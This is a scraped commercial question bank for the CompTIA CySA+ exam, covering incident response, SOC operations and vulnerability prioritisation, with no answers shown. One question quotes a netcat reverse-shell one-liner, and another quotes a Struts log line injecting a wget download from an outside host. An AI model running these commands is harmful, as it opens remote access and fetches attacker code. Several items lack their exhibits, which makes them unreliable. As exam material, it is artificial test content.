Summer Certification Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Questions 4

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

Options:

A.

KPI

B.

SLO

C.

SLA

D.

MOU

Buy Now
Questions 5

During a routine review of DNS logs, a security analyst observes that Host X has been making frequent DNS requests to domains with random alphanumeric strings, such as ajd8ekthj.xyz. IPS anomaly rules are blocking these domains. This behavior started shortly after a new software installation on the host. Which of the following should the analyst do first to determine whether Host X has been compromised?

Options:

A.

Allow the domains because the DNS requests are part of a misconfigured software update.

B.

Check the software installation logs for errors and reinstall the software.

C.

Block all outbound connections from the host to prevent further DNS queries.

D.

Use threat intelligence to check whether the queried domains are associated with legitimate sites.

Buy Now
Questions 6

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

Options:

A.

Delivery

B.

Command and control

C.

Reconnaissance

D.

Weaporization

Buy Now
Questions 7

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes

does this describe?

Options:

A.

Business continuity plan

B.

Lessons learned

C.

Forensic analysis

D.

Incident response plan

Buy Now
Questions 8

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code?

Options:

A.

Address space layout randomization

B.

Data execution prevention

C.

Stack canary

D.

Code obfuscation

Buy Now
Questions 9

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

Options:

A.

Service-level agreement

B.

Change management plan

C.

Incident response plan

D.

Memorandum of understanding

Buy Now
Questions 10

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

Options:

A.

Information sharing organization

B.

Blogs/forums

C.

Cybersecuritv incident response team

D.

Deep/dark web

Buy Now
Questions 11

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?

Options:

A.

Registry editing

B.

Network mapping

C.

Timeline analysis

D.

Write blocking

Buy Now
Questions 12

A systems administrator receives several reports about emails containing phishing links. The hosting domain is always different, but the URL follows a specific pattern of characters. Which of the following is the best way for the administrator to find more messages that were not reported?

Options:

A.

Search email logs for a regular expression

B.

Open a support ticket with the email hosting provider

C.

Send a memo to all staff asking them to report suspicious emails

D.

Query firewall logs for any traffic with a suspicious website

Buy Now
Questions 13

An incident response team is assessing attack vectors of malware that is encrypting data with ransomware. There are no indications of a network-based intrusion.

Which of the following is the most likely root cause of the incident?

Options:

A.

USB drop

B.

LFI

C.

Cross-site forgery

D.

SQL injection

Buy Now
Questions 14

A security analyst provides the management team with an after-action report for a security incident. Which of the following is the management team most likely to review in order to correct validated issues with the incident response processes?

Options:

A.

Tabletop exercise

B.

Lessons learned

C.

Root cause analysis

D.

Forensic analysis

Buy Now
Questions 15

A company ' s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which

of the following groups should the issue be escalated to first in order to comply with industry best practices?

Options:

A.

Help desk

B.

Law enforcement

C.

Legal department

D.

Board member

Buy Now
Questions 16

A DevOps analyst implements a webhook to trigger code vulnerability scanning for submissions to the repository. Which of the following is the primary benefit of this enhancement?

Options:

A.

To increase coverage by making the process occur automatically with uploads

B.

To create a single pane of glass dashboard for the vulnerability management process

C.

To include a threat feed component into the software development life cycle

D.

To employ data enrichment for new code commits to enhance project documentation

Buy Now
Questions 17

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?

Options:

A.

Ask another team member to demonstrate their process.

B.

Email a link to a website that shows someone demonstrating a similar process.

C.

Let the junior analyst research and develop a process.

D.

Write a step-by-step document on the team wiki outlining the process.

Buy Now
Questions 18

A security analyst receives the below information about the company ' s systems. They need to prioritize which systems should be given the resources to improve security.

Host

OS

Key Software

AV

Server 1

Windows Server 2008 R2

Microsoft IIS

Kaspersky

Server 2

Ubuntu Server 22.04 LTS

Apache 2.4.29

None

Computer 1

Windows 11 Professional

N/A

Windows Defender

Computer 2

Windows 10 Professional

N/A

Windows Defender

Which of the following systems should the analyst remediate first?

Options:

A.

Computer 1

B.

Server 1

C.

Computer 2

D.

Server 2

Buy Now
Questions 19

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Options:

A.

Disk contents

B.

Backup data

C.

Temporary files

D.

Running processes

Buy Now
Questions 20

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has bee running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?

Options:

A.

Changes to system environment variables

B.

SMB network traffic related to the system process

C.

Recent browser history of the primary user

D.

Activities taken by PID 1024

Buy Now
Questions 21

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

Options:

A.

A fake antivirus program was installed by the user.

B.

A network drive was added to allow exfiltration of data

C.

A new program has been set to execute on system start

D.

The host firewall on 192.168.1.10 was disabled.

Buy Now
Questions 22

A security analyst performs a vulnerability scan. Given the following findings:

Which of the following machines should the analyst address first? (Select two).

Options:

A.

Server1

B.

Server2

C.

server3

D.

Server4

E.

Server5

F.

Server 6

Buy Now
Questions 23

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following

would best aid in decreasing the workload without increasing staff?

Options:

A.

SIEM

B.

XDR

C.

SOAR

D.

EDR

Buy Now
Questions 24

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Buy Now
Questions 25

A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2 > & 1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

Options:

A.

Network pivoting

B.

Host scanning

C.

Privilege escalation

D.

Reverse shell

Buy Now
Questions 26

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

Options:

A.

SQL injection

B.

LFI

C.

XSS

D.

CSRF

Buy Now
Questions 27

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

Options:

A.

Hacklivist

B.

Advanced persistent threat

C.

Insider threat

D.

Script kiddie

Buy Now
Questions 28

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.

Instructions:

Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.

Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results.

The Linux Web Server, File-Print Server and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

Options:

Buy Now
Questions 29

A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to analyze network traffic to search for malicious activity?

Options:

A.

WAF

B.

Wireshark

C.

EDR

D.

Nmap

Buy Now
Questions 30

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

Options:

A.

Hacktivist

B.

Organized crime

C.

Nation-state

D.

Lone wolf

Buy Now
Questions 31

Which of the following does " federation " most likely refer to within the context of identity and access management?

Options:

A.

Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access

B.

An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains

C.

Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user

D.

Correlating one ' s identity with the attributes and associated applications the user has access to

Buy Now
Questions 32

Which of the following attributes is part of the Diamond Model of Intrusion Analysis?

Options:

A.

Delivery

B.

Weaponization

C.

Command and control

D.

Capability

Buy Now
Questions 33

During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee ' s

personal email. Which of the following should the analyst recommend be done first?

Options:

A.

Place a legal hold on the employee ' s mailbox.

B.

Enable filtering on the web proxy.

C.

Disable the public email access with CASB.

D.

Configure a deny rule on the firewall.

Buy Now
Questions 34

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

Options:

A.

CDN

B.

Vulnerability scanner

C.

DNS

D.

Web server

Buy Now
Questions 35

A vulnerability scan shows the following vulnerabilities in the environment:

At the same time, the following security advisory was released:

" A zero-day vulnerability with a CVSS score of 10 may be affecting your web server. The vendor is working on a patch or workaround. "

Which of the following actions should the security analyst take first?

Options:

A.

Contact the web systems administrator and request that they shut down the asset.

B.

Monitor the patch releases for all items and escalate patching to the appropriate team.

C.

Run the vulnerability scan again to verify the presence of the critical finding and the zero-day vulnerability in the environment.

D.

Forward the advisory to the web security team and initiate the prioritization strategy for the other vulnerabilities.

Buy Now
Questions 36

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.

Scope

B.

Weaponization

C.

CVSS

D.

Asset value

Buy Now
Questions 37

A security manager reviews the permissions for the approved users of a shared folder and finds accounts that are not on the approved access list. While investigating an incident, a user discovers data discrepancies in the file. Which of the following best describes this activity?

Options:

A.

Filesystem anomaly

B.

Illegal software

C.

Unauthorized changes

D.

Data exfiltration

Buy Now
Questions 38

Which of the following explains how MTTD can affect incident response reporting and communication?

Options:

A.

Having a shorter MTTD reduces the potential impact of an incident.

B.

Improved MTTD ensures the leadership team is made aware of threats before exploitation.

C.

MTTD defines the maximum time allowed between detection and response.

D.

MTTD is part of regulatory compliance and outlines an approved process for reporting.

Buy Now
Questions 39

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user ' s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

Options:

A.

Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities

B.

Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation

C.

Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identity the case as an HR-related investigation

D.

Notify the SOC manager for awareness after confirmation that the activity was intentional

Buy Now
Questions 40

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl. < init > (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.

Create a backdoor root account named zsh.

B.

Execute commands through an unsecured service account.

C.

Send a beacon to a command-and-control server.

D.

Perform a denial-of-service attack on the web server.

Buy Now
Questions 41

The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate?

Options:

A.

Alert department managers to speak privately with affected staff.

B.

Schedule a press release to inform other service provider customers of the compromise.

C.

Disclose to all affected parties in the Chief Operating Officer for discussion and resolution.

D.

Verify legal notification requirements of PII and SPII in the legal and human resource departments.

Buy Now
Questions 42

During a recent site survey. an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the network while preserving evidence?

Options:

A.

Run a packet sniffer to monitor traffic to and from the access point.

B.

Connect to the access point and examine its log files.

C.

Identify who is connected to the access point and attempt to find the attacker.

D.

Disconnect the access point from the network

Buy Now
Questions 43

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

Options:

A.

Exploitation

B.

Reconnaissance

C.

Command and control

D.

Actions on objectives

Buy Now
Questions 44

Which of the following would an organization use to develop a business continuity plan?

Options:

A.

A diagram of all systems and interdependent applications

B.

A repository for all the software used by the organization

C.

A prioritized list of critical systems defined by executive leadership

D.

A configuration management database in print at an off-site location

Buy Now
Questions 45

Results of a SOC customer service evaluation indicate high levels of dissatisfaction with the inconsistent services provided after regular work hours. To address this, the SOC lead drafts a document establishing customer expectations regarding the SOC ' s performance and quality of services. Which of the following documents most likely fits this description?

Options:

A.

Risk management plan

B.

Vendor agreement

C.

Incident response plan

D.

Service-level agreement

Buy Now
Questions 46

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Buy Now
Questions 47

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A.

XSS

B.

CSRF

C.

SSRF

D.

RCE

Buy Now
Questions 48

During a training exercise, a security analyst must determine the vulnerabilities to prioritize. The analyst reviews the following vulnerability scan output:

Which of the following issues should the analyst address first?

Options:

A.

Allows anonymous read access to /etc/passwd

B.

Allows anonymous read access via any FTP connection

C.

Microsoft Defender security definition updates disabled

D.

less command allows for escape exploit via terminal

Buy Now
Questions 49

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

Options:

A.

Instruct the firewall engineer that a rule needs to be added to block this external server.

B.

Escalate the event to an incident and notify the SOC manager of the activity.

C.

Notify the incident response team that a DDoS attack is occurring.

D.

Identify the IP/hostname for the requests and look at the related activity.

Buy Now
Questions 50

A company was able to reduce triage time by focusing on historical trend analysis. The business partnered with the security team to achieve a 50% reduction in phishing attempts year over year. Which of the following action plans led to this reduced triage time?

Options:

A.

Patching

B.

Configuration management

C.

Awareness, education, and training

D.

Threat modeling

Buy Now
Questions 51

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

Options:

A.

TO ensure the report is legally acceptable in case it needs to be presented in court

B.

To present a lessons-learned analysis for the incident response team

C.

To ensure the evidence can be used in a postmortem analysis

D.

To prevent the possible loss of a data source for further root cause analysis

Buy Now
Questions 52

During a security incident, security tools quarantine a device and create a disk image. During the analysis, the image is corrupted. Which of the following best describes how the analyst should proceed with the investigation?

Options:

A.

Remediate the corruption that just occurred.

B.

Repair with bootable media.

C.

Rebuild the device’s OS.

D.

Restore from an archived copy.

Buy Now
Questions 53

Which of the following best describes the goal of a tabletop exercise?

Options:

A.

To test possible incident scenarios and how to react properly

B.

To perform attack exercises to check response effectiveness

C.

To understand existing threat actors and how to replicate their techniques

D.

To check the effectiveness of the business continuity plan

Buy Now
Questions 54

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

Options:

A.

External

B.

Agent-based

C.

Non-credentialed

D.

Credentialed

Buy Now
Questions 55

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

Options:

A.

SOAR

B.

SIEM

C.

SLA

D.

IoC

Buy Now
Questions 56

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

Options:

A.

Registry change

B.

Rename computer

C.

New account introduced

D.

Privilege escalation

Buy Now
Questions 57

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.

Implementing credentialed scanning

B.

Changing from a passive to an active scanning approach

C.

Implementing a central place to manage IT assets

D.

Performing agentless scanning

Buy Now
Questions 58

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?

Options:

A.

Timeline

B.

Evidence

C.

Impact

D.

Scope

Buy Now
Questions 59

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

Options:

A.

Running regular penetration tests to identify and address new vulnerabilities

B.

Conducting regular security awareness training of employees to prevent social engineering attacks

C.

Deploying an additional layer of access controls to verify authorized individuals

D.

Implementing intrusion detection software to alert security teams of unauthorized access attempts

Buy Now
Questions 60

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

Options:

A.

CASB

B.

SASE

C.

ZTNA

D.

SWG

Buy Now
Questions 61

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?

Options:

A.

The risk would not change because network firewalls are in use.

B.

The risk would decrease because RDP is blocked by the firewall.

C.

The risk would decrease because a web application firewall is in place.

D.

The risk would increase because the host is external facing.

Buy Now
Questions 62

Which of the following is a circumstance in which a security operations manager would most likely consider using automation?

Options:

A.

The generation of NIDS rules based on received STIX messages

B.

The fulfillment of privileged access requests to enterprise domain controllers

C.

The verification of employee identities prior to initial PKI enrollment

D.

The analysis of suspected malware binaries captured by an email gateway

Buy Now
Questions 63

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The site ' s standard VPN logon page is

www.acme.com/logon. Which of the following is most likely true?

Options:

A.

This is a normal password change URL.

B.

The security operations center is performing a routine password audit.

C.

A new VPN gateway has been deployed

D.

A social engineering attack is underway

Buy Now
Questions 64

A Chief Information Security Officer wants to lock down the users ' ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?

Options:

A.

HIPS

B.

GPO

C.

Registry

D.

DLP

Buy Now
Questions 65

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Options:

A.

CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H

B.

CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H

C.

CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H

D.

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Buy Now
Questions 66

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

Options:

A.

Enrich the SIEM-ingested data to include all data required for triage.

B.

Schedule a task to disable alerting when vulnerability scans are executing.

C.

Filter all alarms in the SIEM with low severity.

D.

Add a SOAR rule to drop irrelevant and duplicated notifications.

Buy Now
Questions 67

During a routine review, a security analyst identifies an unusual volume of traffic going to a local network workstation. The analyst extracts the traffic to a pcap file. To analyze the content, the analyst runs the command tcpdump -n -r file.pcap udp and port 53 and receives the following output:

Which of the following conclusions will the analyst reach based on the pcap analysis?

Options:

A.

The traffic captured a meterpreter payload delivery.

B.

The traffic shows data exfiltration.

C.

The traffic identified a Structured Query Language Injection attack.

D.

The traffic Is associated with Domain Name System Security Extensions.

E.

The traffic is normal on a Unix-based network.

Buy Now
Questions 68

ID

Source

Destination

Protocol

Service

1

172.16.1.1

172.16.1.10

ARP

AddrResolve

2

172.16.1.10

172.16.1.20

TCP 135

RPC Kerberos

3

172.16.1.10

172.16.1.30

TCP 445

SMB WindowsExplorer

4

172.16.1.30

5.29.1.5

TCP 443

HTTPS Browser.exe

5

11.4.11.28

172.16.1.1

TCP 53

DNS Unknown

6

20.109.209.108

172.16.1.1

TCP 443

HTTPS WUS

7

172.16.1.25

bank.backup.com

TCP 21

FTP FileZilla

Which of the following represents the greatest concerns with regard to potential data exfiltration? (Select two.)

Options:

A.

1

B.

2

C.

3

D.

4

E.

5

F.

6

G.

7

Buy Now
Questions 69

A penetration tester is conducting a test on an organization ' s software development website. The penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

Options:

A.

SQL injection

B.

Local file inclusion

C.

Cross-site scripting

D.

Directory traversal

Buy Now
Questions 70

A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

Options:

A.

Corrective controls

B.

Compensating controls

C.

Operational controls

D.

Administrative controls

Buy Now
Questions 71

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?

Options:

A.

Non-repudiation

B.

Authentication

C.

Authorization

D.

Integrity

Buy Now
Questions 72

An organization is conducting a pilot deployment of an e-commerce application. The application ' s source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?

Options:

A.

Static testing

B.

Vulnerability testing

C.

Dynamic testing

D.

Penetration testing

Buy Now
Questions 73

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

Options:

A.

Change the display filter to f cp. accive. pore

B.

Change the display filter to tcg.port=20

C.

Change the display filter to f cp-daca and follow the TCP streams

D.

Navigate to the File menu and select FTP from the Export objects option

Buy Now
Questions 74

The SOC received a threat intelligence notification indicating that an employee ' s credentials were found on the dark web. The user ' s web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor

authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

Options:

A.

Perform a forced password reset.

B.

Communicate the compromised credentials to the user.

C.

Perform an ad hoc AV scan on the user ' s laptop.

D.

Review and ensure privileges assigned to the user ' s account reflect least privilege.

E.

Lower the thresholds for SOC alerting of suspected malicious activity.

Buy Now
Questions 75

A security analyst has received an incident case regarding malware spreading out of control on a customer ' s network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Buy Now
Questions 76

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:

Security Policy 1006: Vulnerability Management

1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.

2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.

3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A)

B)

C)

D)

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Buy Now
Questions 77

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?

Options:

A.

Structured Threat Information Expression

B.

OWASP Testing Guide

C.

Open Source Security Testing Methodology Manual

D.

Diamond Model of Intrusion Analysis

Buy Now
Questions 78

Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?

Options:

A.

STIX/TAXII

B.

APIs

C.

Data enrichment

D.

Threat feed

Buy Now
Questions 79

Options:

A.

Credentialed scans

B.

Individual scans

C.

Security baseline scans

D.

Agent-based scans

Buy Now
Questions 80

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Options:

A.

Command and control

B.

Data enrichment

C.

Automation

D.

Single sign-on

Buy Now
Questions 81

A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likely use for this task?

Options:

A.

A regular expression in Bash

B.

Filters in the vi editor

C.

Variables in a PowerShell script

D.

A playbook in a SOAR tool

Buy Now
Questions 82

An analyst reviews the following list of vulnerabilities:

CVE ID | CVSS | Weaponized | Count | Location

CVE-2024-9837 | 9.2 | Yes | 58 | Internal

CVE-2024-9964 | 9.0 | Yes | 24 | Internal

CVE-2023-8524 | 9.1 | Yes | 55 | External

CVE-2024-1587 | 8.7 | Yes | 55 | Internal

The analyst determines that CVE-2023-8524 is the highest priority for remediation and should be patched immediately. Which of the following did the analyst use to determine the priority of remediation efforts?

Options:

A.

Context awareness

B.

Criticality

C.

Exploit availability

D.

Recurrence

Buy Now
Questions 83

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PH data. Which of the following is the best reason for developing the organization ' s communication plans?

Options:

A.

For the organization ' s public relations department to have a standard notification

B.

To ensure incidents are immediately reported to a regulatory agency

C.

To automate the notification to customers who were impacted by the breach

D.

To have approval from executive leadership on when communication should occur

Buy Now
Questions 84

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Buy Now
Questions 85

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an Http Only flag to force communication by HTTPS.

B.

Block requests without an X-Frame-Options header.

C.

Configure an Access-Control-Allow-Origin header to authorized domains.

D.

Disable the cross-origin resource sharing header.

Buy Now
Questions 86

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

Options:

A.

Join an information sharing and analysis center specific to the company ' s industry.

B.

Upload threat intelligence to the IPS in STIX/TAXII format.

C.

Add data enrichment for IPS in the ingestion pipleline.

D.

Review threat feeds after viewing the SIEM alert.

Buy Now
Questions 87

%77%77%77%2e%69%63%65%2d%70%74%69%63%2e%63%6f%6d

Which of the following would most likely explain this behavior?

Options:

A.

The string contains obfuscated JavaScript shellcode

B.

The text is encoded and designed to bypass spam filters.

C.

The email client has a parsing error elsewhere in the message.

D.

The sandboxed PC used for testing has non-default configurations.

Buy Now
Questions 88

An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to prepare for supporting this new requirement?

Options:

A.

Choose a vendor to utilize for the disaster recovery location.

B.

Establish prioritization of continuity from data and business owners.

C.

Negotiate vendor agreements to support disaster recovery capabilities.

D.

Advise the leadership team that a geographical area for recovery must be defined.

Buy Now
Questions 89

Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you have been tasked with handling this Situation.

Review the information provided and determine the following:

1. HOW many employees Clicked on the link in the Phishing email?

2. on how many workstations was the malware installed?

3. what is the executable file name of the malware?

Options:

Buy Now
Questions 90

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Options:

A.

Geoblock the offending source country

B.

Block the IP range of the scans at the network firewall.

C.

Perform a historical trend analysis and look for similar scanning activity.

D.

Block the specific IP address of the scans at the network firewall

Buy Now
Questions 91

Which of the following is the most important reason a company would use APIs instead of scripts to enable communication between tools from different vendors?

Options:

A.

To reduce integration maintenance

B.

To use a tool that was built in-house

C.

To allow for more customization

D.

To secure the CI/CD pipeline

Buy Now
Questions 92

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been

compromised. Which of the following steps should the administrator take next?

Options:

A.

Inform the internal incident response team.

B.

Follow the company ' s incident response plan.

C.

Review the lessons learned for the best approach.

D.

Determine when the access started.

Buy Now
Questions 93

Which of the following is best suited for determining the methods of an adversary?

Options:

A.

OWASP

B.

Penetration Test Framework

C.

OSSTMM

D.

Diamond Model of Intrusion Analysis

Buy Now
Questions 94

An analyst is reviewing a dashboard from the company ' s SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?

Options:

A.

MITRE ATT & CK

B.

OSSTMM

C.

Diamond Model of Intrusion Analysis

D.

OWASP

Buy Now
Questions 95

Which of the following should be updated after a lessons-learned review?

Options:

A.

Disaster recovery plan

B.

Business continuity plan

C.

Tabletop exercise

D.

Incident response plan

Buy Now
Questions 96

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

Options:

A.

DLP

B.

NAC

C.

EDR

D.

NIDS

Buy Now
Questions 97

A security operations center analyst is using the command line to display specific traffic. The analyst uses the following command:

tshark -r file.pcap -Y " http or udp "

